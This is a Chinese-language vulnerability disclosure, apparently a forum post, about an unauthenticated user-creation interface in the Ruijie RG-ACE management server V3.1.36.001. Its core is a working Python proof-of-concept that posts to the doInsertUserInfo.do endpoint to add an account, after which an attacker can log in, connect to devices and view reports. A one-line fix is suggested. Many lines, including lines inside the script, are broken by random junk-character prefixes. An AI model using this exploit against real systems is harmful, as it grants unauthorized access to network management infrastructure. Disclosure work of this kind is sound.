锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
! J8 J$ M0 ]! Y" V) G+ I
9 W* N3 U$ C3 E. X; I$ N/ I
; L: f/ S+ ]) e$ @& c+ b测试的具体版本是
产品名称: 锐捷应用控制引擎
& F0 d1 S' O% q' O% g& q4 b. C# I/ m版本号: 3.1.36.001 TC
/ d/ S, \9 y. F0 I( H* }编译时间: 201104291730

7 c$ b; u4 B' {* H/ U8 Q% c
: G* g$ {+ u) L* T' X/ j! B' K2 O漏洞证明：
. d" i" o/ \5 ~6 T
! G6 b/ s! U5 M# f9 U

( t; m3 J) G( C  e
8 Q+ ]/ d  Y9 R7 S" I8 ~

执行脚本
#! /usr/bin/env python
0 {+ [' l  Q( G3 N, f; E( q1 f#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
& N: U+ T2 J* W  k& C/ Z% @4 I" pimport urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
& l. G& a1 x, u) `2 xopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
, Q8 R: I& U/ Y9 _7 ~5 }post=(("event","userManager.doInsertUserInfo"),
7 _' _* o0 m  x% L- A* G: g("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
" d# A9 L$ A( a/ s; r("trueName","ad"),
; v3 W" H, \* S1 W7 v4 q6 V2 w("email",""),
("mobilePhone",""),
$ Q7 y$ q9 J" J8 V("officePhone",""),
("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
2 E/ u9 h5 s. D! |0 E! b/ L$ J, Nprint "Done"

4 W/ `1 t. P- T: i登录，连接设备
9 b/ G2 O( G/ {' a7 p2 O$ ?/ e
( y6 ?% W9 V. |4 a: C' v( c


* P7 a. g1 M* N. s8 w6 d
默认的管理员admin权限更大点

) G& i) N  T6 a: ~

1 ]! Q2 g  j# [+ Y5 d0 r1 \2 t8 s

修复方案：
加强对接口的权限验证

$ z0 l  {; S- _7 d4 I9 b* O% n